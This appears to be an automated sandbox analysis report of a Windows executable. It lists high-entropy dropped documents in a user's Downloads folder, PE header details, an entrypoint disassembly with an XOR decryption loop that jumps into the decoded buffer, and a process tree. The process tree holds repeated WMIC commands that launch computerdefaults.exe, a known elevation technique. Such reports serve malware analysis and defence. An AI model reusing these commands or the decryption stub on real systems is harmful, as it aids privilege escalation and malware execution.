                                                                                                MD5:B40A66A91EE1ED803E303020E03BBF35
                                                                                                SHA1:DEC4FF4EC80FCBB46E4E55D8D855ACF45B65CC3C
                                                                                                SHA-256:675598F7424C0A1007E4E220CAF72921D2BA3D5B46F82B8911F0EA9F9CB40700
                                                                                                SHA-512:B24EBC655EB78DBCCC14A2B5EC913F5DF63DAF9418A32CA13A32C823F422E13BD59573252C436D957AEBA853FFBCE329E73A0BA2C44E1C3C6EF7ABB2526CE619
                                                                                                Malicious:false
                                                                                                Preview: ...].q.W....L..b.K.X.m....T..mHY.M...[...cz...Y.q..r*T.Gr8..f......^.aBJ.,m.........d.*.......!.,S...3Y.h.l.7t[...^.I....E!..).L......5.'....qhz.=_.~..ft...x..{.xW..G.Q.q`.a....+.d.a+.L.....^G.G.s..t.e.~FrM..l.OU........_....{k"...q6.]....%/>R.._A+..Y.....n..!7L.....5..K.F>.i^..E}.D..||......mR).%o.....j.......E.f....}.!&t...i.....o.k.(..l.....H..............nK..'L.U\..y..JKh[[<.j.......~B.%....1.B..:.*.F...V..8...i.[....................U...P!..Fs,x.lQ.h......u.y5.."... .f.."z....Q..0.F..I....U....i....(.h(..t}..&..d.....b...D_..6.u..u..$.H2.K..7...I.q.:)#v.T..'.s. .L..+.7#z2]..].@...V.rY+01....w.T..N.*........1PCr.c....)FA........O.._.TQ.Zg.......p.~8H.Xy......p..0+.kk....<..m....d..*4yv...I.......X@&.#..G.....>!..Gd.....^.@HU......-+....J.;.....1....?...]..H....._.....G...E...#R3;.{j.*../.....U$K.2.!WJ.#....u Cea....P..l..&.99...".V...z..]A\.6.r8..?l..1..9.8.....y...\6V..zI.!..>.zUK.W..+.......^.(....Zn...d.Z...O..s#.E..r....*a..,..<..
                                                                                                C:\Users\user\Downloads\IPKGELNTQY.docx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.853526068147351
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:5+qDlUHMM6ZnEiPfJnSRkBCVvY/r4S+geBUKlaifGfhWx1TZMh0cdUZFgOW:5yDYnEiH8RkwNYD3qlaiucxtK0cYgJ
                                                                                                MD5:83FA4BBF3FE4843AACF96C9E7F12EE81
                                                                                                SHA1:69451AADB4CC88C1A543BF6EFEA2D375B72E5B8C
                                                                                                SHA-256:A4C2AE596182D2A08D97E3E7B3D2F6243222A1DC3C9A7A7C5691497C5E8C09F6
                                                                                                SHA-512:AEEA83DC67A425D420245038354C8DB54EA17F92F0B1DDFD97AEF2C008151A19D7CD29DA060CF6D97B408B107179CFA52682E776F0D4F064CBE3DDD384016E70
                                                                                                Malicious:false
                                                                                                Preview: ..~oI37........A ......K...h..#.,..E.W....;..t.;Br.2@j....6.Bp.d...6o_......q6...$..4.IZ........}......Z.BrM....:E....#.....q.S../...'.V..Q.=....u.!..y0/.|...X..p....v...........x..6...s...O......t.&.t.:....n....3_B.g.........6.....n2..b.=...1.....OC./..;..7h&...k$Y..d..o}..U.:c.n7.,.l.r..8....:....]y........_.@N+A.p..|.r.>i4.r..}....c..eZ..|.....@.<D"\.#.f.............+........c..I\.i.....Qe<B.M.,..S.>.B_..V..,.3k..m..9.......R.....1.8.Of3..h.....\.Mz.L.....L..7.....|....Ne......:.}...3.......c.k.....;..N&...bS\2..._]....^.%..s.^4i...1..c;t4.`u..-f....d.....f.\..p..cB...e-D.R.i...}.+.}....q.."..?-.C..|C..seO...........oG...x7gLa.o6K8e...l...w.T.d........r...j...A.*E.s ~.. .Q.e.o.._ ...?.=.....D.^...}.#.uB.?[....7..9.....0&.T.]M....o4.5......`E.K^..I..K...r'V+.%*.] 0......M..M;.4,`.{I.;2}X\>...?>.O..o..z.xD..2r.'.`....mH.>.....|.......]3...h.,v]..h.....E..?.-*.].J.a........V.......])..o`.I..lY.....d...z}...t.W..=z..K...........|.T.
                                                                                                C:\Users\user\Downloads\LSBIHQFDVT.docx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.857695718320419
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:JjeLhxp0I7THzUaQpDIMaBBp8mrMBOpDvUE3ZR1wyWatdI5:JaLt0y7SDIMaamw4p4E3Tds
                                                                                                MD5:CF33019E5C9573B5650CB247B365CAF7
                                                                                                SHA1:CF379D59200758A7EFAC253DAA168F3E5B3DA65F
                                                                                                SHA-256:21598A059269A24F2B5A770F2BF5F5C65CE80C5AB8946B3ABA89A749FE0D8BD1
                                                                                                SHA-512:6C8BAD9F4E22EF367B28F3994BE9182ACE8A991ED3BF9DF839586B0D4592029D7B0BA08A376B4D12F2B81B466D425D888122D3EE0E6F93130F53B1F4B1A3520E
                                                                                                Malicious:false
                                                                                                Preview: ....Ud..Z....jb0...w.p........9.4P..[i..c..-.JI.%........7.7Z..nK..........hu<.et..&.4.-S.0u.1a.Y;QB .q......G`.Jj+b..>s.W#-...:...7....E...7......Khr]=..vo...."..p(....`:;......Gm;.x9.......X.\jD.s....`..~4..n=.q........z.........,.p&.n,....OA...q.n.....O..~~....~.S.3._E..w..g...5'...!.s.'.Vw..ykU}N...}fg..`L...S#Y.{....\d,...F.... .._...(..(M.:F.t..).X.".B..y.F.U.&..`...........T...O.@...2......+...Z#.>.U...%......#&Mt....t...-tD.._....'......^..,.,+.:..[r...0.W..i......\M. .X.M_.4.9.d.A..Q....w.F.l.w.,k..X.jV...'....Jv...4.u.I..L.~......\..*..../...<?.I...`.F,U..?...-..[.b.'..t.....B.......m....1.\M.y.....:.....>...,V.H.^...g.|..\.T... I.C.MA...rv..%!...i.D....C0......m..+D71.y...K,..a....e.5........~..%$....T...1f..4...ON..I....\4.QZ$S.D.y.....t5&.'..._......;K9.W......%..^zhOo.pR.6%.......=.....\$..|...-\U5...S.....8.z.sf[.......K..c.h....dm0..w.vH..l^...+.jG.S.J.d9.3..4..{..|.8t..}j.f.A.a.v.....0?.<..~..V]*;Gxh.7.I..z.h.
                                                                                                C:\Users\user\Downloads\LSBIHQFDVT.pdf
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.869799554992408
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:7Iukp5dnr1YEy96567QGhTkL4Z8Y3gRT0akvflimLaFU5Zix8Q:7D0YEy96A7QGhoEgRTZAgyaiit
                                                                                                MD5:2B23BBD26D52B32258216767FABB1410
                                                                                                SHA1:5622D6A26F3E72414F9864790C23C2BAD40ECFAC
                                                                                                SHA-256:07A3B88783EC86BC160D4E2C171C4FDF3DEA445F098F15B82C15B422E816BEF2
                                                                                                SHA-512:5D82FCCAB4E5E69D16282E36E7BFFF25A97741E7A4CFEAF588126BEF3B4480A87F4AFCFD768480188B8F5DB051948E1892A5DEA43B869C3249613FFB9BFEDA6E
                                                                                                Malicious:false
                                                                                                Preview: Aa{LpX{"..k.O.!.......r.."h.....Op@.z.|`c.N.U.G~.0........T..j.=R..... .p..Pm..JRMf|1.?.?..M.....9[.g...bi.h.M.6...U.kN.\.?..md..2.......s.;....K?...^e..W..."...M......rS.-..E....v......._..^..$.;~....!.J....XF....5G...[4...t0f..xu).."...[iJQf4<....;...i.n.OB6.N.OA.OT.+..n..m.....*.ds..ZI.;{..Y...z`?...s.......R..a.\L[..Z.w.h..(......x..+..yGZ.^.)W..Q..5}...K,.D..+.X.C.<..iEI5l..y1.X#....vC..N..A=.?............O......mdd....x.r"....&-......*V>.5..l+o.7.N.$}.u.......E..).s....?.f..0...d ..........d...S..H..Q9a9d....... .U...m@5}..V.oo....-.....B..i..fRy>:$....Z.F..u..ZQ1.>..o0...)l...b?....{[.Repq.!..2..Q.xr..u.....3...Q...a..Zy...W.....Z..^....q.... ..w....>3...1T...2..@....Iw..I..._J.}(F.=w..vo.8.........I...-.K^Y....e........%Uv.<.=.O.......Z. .u.3o.(}!.,\YV.).g.`...f-W.-.=......,..os....-..=.-.5.....!@.GN...S..8..Z.?..RV&U.<...ac........9..D.w.....Tc..k......e%]4o.f.p.2..3..........0......!.....:..../u..Fd..+0 ...S(.....w-....AG
                                                                                                C:\Users\user\Downloads\NEBFQQYWPS.docx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.843288920796012
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:uDS3gPTEyniEP/iqacYSgXl66U8/Dc0PoV8tzDnBHgn7:a74EPKcYFXl6GD3PWSzNHgn7
                                                                                                MD5:F3947AA26EB3CD97917194E65E60D0DB
                                                                                                SHA1:D552DF64AA21E7BDBECB6FFB5781C3F16DF5F96D
                                                                                                SHA-256:331049B76220F4F249B051C512BD948857757371C1C0CAC369C4C1AE0209B2D9
                                                                                                SHA-512:695C6177911F9719AABBBD435829F6D248DD8F36C5E7F5A41EE88B602CFD4DBB50FB03809797E2851D48E120FB8D67A5828D54FF933E7181D182C84CD0B0AF3D
                                                                                                Malicious:false
                                                                                                Preview: .........+..0_L...q...5(P..LOv.......|.rS....X..BE..P..cg..W..w.x.Xi.....N.......?.g=......GM(....U..z..l......8...0El!.%RPH.....m.,C.a.....2...fPe5.K...#...b\...$.'..I...d..+....:.QH......5.a...,q.k./..r.?Z'@.hB..S....L;.VZ#.....I...g......>.'.eR.vJ.u.UHy.&...w.v..K..z.1.(y..BR+....L.i.-...Q.z.R..-jg......P.....`.3Y/h.p......k..L....V9..F/.x=_e........c;725.:.....&"B...xf.G.0...[....$..".....n...m#..g...Mp\..x{.!......*.O....a..$...{.....F..JXr<...u.N.l...Lr.c...j..."...0..(C....}.<.gw..r.....%....o.X...%*L...Y....p....).]Ur..y~........|-...^Ef......Q........:.......r.).<.N;.\.~.&...b..7..Gw....jL.Ga..Q..]nc.`.!.78..].-..Hg....7..k.j.....w...U...b.._g........{..x....WI..T.1....%..`6..... w..<..D........v.....2......;.=F.D.l..1U....x[....k.o....k........|RX...[.A;y....~\..rJ.....q...ct..)&...:.'6W.?G.6.........x.....c...Z.b.._+P{...C;s...&.gf.1......e....q0.O'.bf%...=F.H..lC_f...........#.S..x.jt....V...........LJ..+AT.......

                                                                                                Static File Info

                                                                                                General

                                                                                                File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                Entropy (8bit):7.375182779773526
                                                                                                TrID:
                                                                                                • Win64 Executable GUI (202006/5) 92.65%
                                                                                                • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                • DOS Executable Generic (2002/1) 0.92%
                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                File name:7906dc47_by_Libranalysis.exe
                                                                                                File size:23040
                                                                                                MD5:7906dc475a8ae55ffb5af7fd3ac8f10a
                                                                                                SHA1:e7304e2436dc0eddddba229f1ec7145055030151
                                                                                                SHA256:1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367
                                                                                                SHA512:c087b3107295095e9aca527d02b74c067e96ca5daf5457e465f8606dbf4809027faedf65d77868f6fb8bb91a1438e3d0169e59efddf1439bbd3adb3e23a739a1
                                                                                                SSDEEP:384:otLvArTA5n2Kc/vURgbHs19l897hkuzetFS/z1ANkp2RD0CwMiOQkSd:odvOM5UNMRS7W2AiEd08D
                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.G...)...)...).,.....).,.....).,.....).Rich..).........PE..d....e.`.........."......R.....................@...................

                                                                                                File Icon

                                                                                                Icon Hash:00828e8e8686b000

                                                                                                Static PE Info

                                                                                                General

                                                                                                Entrypoint:0x140001000
                                                                                                Entrypoint Section:.text
                                                                                                Digitally signed:false
                                                                                                Imagebase:0x140000000
                                                                                                Subsystem:windows gui
                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                                                                                                Time Stamp:0x60A7650C [Fri May 21 07:45:16 2021 UTC]
                                                                                                TLS Callbacks:
                                                                                                CLR (.Net) Version:
                                                                                                OS Version Major:6
                                                                                                OS Version Minor:0
                                                                                                File Version Major:6
                                                                                                File Version Minor:0
                                                                                                Subsystem Version Major:6
                                                                                                Subsystem Version Minor:0
                                                                                                Import Hash:

                                                                                                Entrypoint Preview

                                                                                                Instruction
                                                                                                dec eax
                                                                                                mov dword ptr [esp+18h], ebx
                                                                                                push edi
                                                                                                dec eax
                                                                                                sub esp, 30h
                                                                                                mov bl, 1Bh
                                                                                                call 00007FFBA4C0A04Bh
                                                                                                dec eax
                                                                                                and dword ptr [esp+48h], 00000000h
                                                                                                dec esp
                                                                                                lea ecx, dword ptr [esp+40h]
                                                                                                dec eax
                                                                                                lea edx, dword ptr [esp+48h]
                                                                                                inc ebp
                                                                                                xor eax, eax
                                                                                                dec eax
                                                                                                or ecx, FFFFFFFFh
                                                                                                mov dword ptr [esp+28h], 00000040h
                                                                                                dec eax
                                                                                                mov edi, eax
                                                                                                dec eax
                                                                                                mov dword ptr [esp+40h], 00005086h
                                                                                                mov dword ptr [esp+20h], 00001000h
                                                                                                call 00007FFBA4C04F82h
                                                                                                dec eax
                                                                                                mov ecx, dword ptr [esp+48h]
                                                                                                xor edx, edx
                                                                                                dec eax
                                                                                                cmp dword ptr [esp+40h], edx
                                                                                                jbe 00007FFBA4C04F42h
                                                                                                xor eax, eax
                                                                                                mov al, byte ptr [eax+edi]
                                                                                                inc ecx
                                                                                                mov eax, 000000FEh
                                                                                                xor al, bl
                                                                                                add bl, FFFFFFFFh
                                                                                                mov byte ptr [ecx], al
                                                                                                movzx eax, bl
                                                                                                dec eax
                                                                                                inc ecx
                                                                                                test bl, bl
                                                                                                inc ecx
                                                                                                cmove eax, eax
                                                                                                inc edx
                                                                                                mov bl, al
                                                                                                mov eax, edx
                                                                                                dec eax
                                                                                                cmp eax, dword ptr [esp+40h]
                                                                                                jc 00007FFBA4C04EE9h
                                                                                                dec eax
                                                                                                mov ecx, dword ptr [esp+48h]
                                                                                                call ecx
                                                                                                dec eax
                                                                                                mov ebx, dword ptr [esp+50h]
                                                                                                dec eax
                                                                                                add esp, 30h
                                                                                                pop edi
                                                                                                ret
                                                                                                int3
                                                                                                int3
                                                                                                int3
                                                                                                int3
                                                                                                int3
                                                                                                int3
                                                                                                int3
                                                                                                int3
                                                                                                int3
                                                                                                int3
                                                                                                int3
                                                                                                int3
                                                                                                push esi
                                                                                                dec eax
                                                                                                mov esi, esp
                                                                                                dec eax
                                                                                                and esp, FFFFFFF0h
                                                                                                dec eax
                                                                                                sub esp, 20h
                                                                                                call 00007FFBA4C04E64h
                                                                                                dec eax
                                                                                                mov esp, esi
                                                                                                pop esi
                                                                                                ret
                                                                                                dec esp
                                                                                                mov edx, ecx
                                                                                                mov eax, 00000018h

                                                                                                Rich Headers

                                                                                                Programming Language:
                                                                                                • [ASM] VS2012 build 50727
                                                                                                • [LNK] VS2012 build 50727

                                                                                                Data Directories

                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x80000xc.pdata
                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                Sections

                                                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                .text0x10000x51580x5200False0.908060213415zlib compressed data7.62659115899IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                .rdata0x70000xc0x200False0.048828125data0.188056906087IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                .pdata0x80000xc0x200False0.041015625data0.0776331623432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                Network Behavior

                                                                                                No network behavior found

                                                                                                Code Manipulations

                                                                                                Statistics

                                                                                                Behavior

                                                                                                Click to jump to process

                                                                                                System Behavior

                                                                                                General

                                                                                                Start time:19:15:13
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:'C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe'
                                                                                                Imagebase:0x7ff6ab570000
                                                                                                File size:23040 bytes
                                                                                                MD5 hash:7906DC475A8AE55FFB5AF7FD3AC8F10A
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:low

                                                                                                General

                                                                                                Start time:19:15:14
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\sihost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:
                                                                                                Imagebase:0x7ff785e90000
                                                                                                File size:79360 bytes
                                                                                                MD5 hash:6F84A5C939F9DA91F5946AF4EC6E2503
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:moderate

                                                                                                General

                                                                                                Start time:19:15:15
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:
                                                                                                Imagebase:0x7ff641cd0000
                                                                                                File size:51288 bytes
                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                General

                                                                                                Start time:19:15:17
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe''
                                                                                                Imagebase:0x7ff7bf140000
                                                                                                File size:273920 bytes
                                                                                                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                General

                                                                                                Start time:19:15:17
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe''
                                                                                                Imagebase:0x7ff7bf140000
                                                                                                File size:273920 bytes
                                                                                                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                General

                                                                                                Start time:19:15:17
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff774ee0000
                                                                                                File size:625664 bytes
                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                General

                                                                                                Start time:19:15:17
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff774ee0000
                                                                                                File size:625664 bytes
                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                General

                                                                                                Start time:19:15:18
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe'
                                                                                                Imagebase:0x7ff796700000
                                                                                                File size:521728 bytes
                                                                                                MD5 hash:EC80E603E0090B3AC3C1234C2BA43A0F
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:moderate

                                                                                                General

                                                                                                Start time:19:15:18
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe'
                                                                                                Imagebase:0x7ff796700000
                                                                                                File size:521728 bytes
                                                                                                MD5 hash:EC80E603E0090B3AC3C1234C2BA43A0F
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:moderate

                                                                                                General

                                                                                                Start time:19:15:18
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:
                                                                                                Imagebase:0x7ff641cd0000
                                                                                                File size:51288 bytes
                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                General

                                                                                                Start time:19:15:18
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe''
                                                                                                Imagebase:0x7ff7bf140000
                                                                                                File size:273920 bytes
                                                                                                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                General

                                                                                                Start time:19:15:19
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:cmd /c computerdefaults.exe
                                                                                                Imagebase:0x7ff7bf140000
                                                                                                File size:273920 bytes
                                                                                                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                General

                                                                                                Start time:19:15:19
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe''
                                                                                                Imagebase:0x7ff7bf140000
                                                                                                File size:273920 bytes
                                                                                                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:19:15:19
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff774ee0000
                                                                                                File size:625664 bytes
                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:19:15:19
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff774ee0000
                                                                                                File size:625664 bytes
                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:19:15:19
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:cmd /c computerdefaults.exe
                                                                                                Imagebase:0x7ff7bf140000
                                                                                                File size:273920 bytes
                                                                                                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:19:15:19
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff774ee0000
                                                                                                File size:625664 bytes
                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:19:15:20
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff774ee0000
                                                                                                File size:625664 bytes
                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:19:15:20
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe'
                                                                                                Imagebase:0x7ff796700000
                                                                                                File size:521728 bytes
                                                                                                MD5 hash:EC80E603E0090B3AC3C1234C2BA43A0F
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:19:15:20
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\ComputerDefaults.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:computerdefaults.exe
                                                                                                Imagebase:0x7ff7f6950000
                                                                                                File size:72192 bytes
                                                                                                MD5 hash:1D494543B5C91E0EDD4C7C6C63EE25F0
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:19:15:20
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe'
                                                                                                Imagebase:0x7ff796700000
                                                                                                File size:521728 bytes
                                                                                                MD5 hash:EC80E603E0090B3AC3C1234C2BA43A0F
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:19:15:20
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\ComputerDefaults.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:computerdefaults.exe
                                                                                                Imagebase:0x7ff7f6950000
                                                                                                File size:72192 bytes
                                                                                                MD5 hash:1D494543B5C91E0EDD4C7C6C63EE25F0
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:19:15:21
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:cmd /c computerdefaults.exe
                                                                                                Imagebase:0x7ff7bf140000
                                                                                                File size:273920 bytes
                                                                                                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:19:15:22
                                                                                                Start date:21/05/2021
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:cmd /c computerdefaults.exe
                                                                                                Imagebase:0x7ff7bf140000
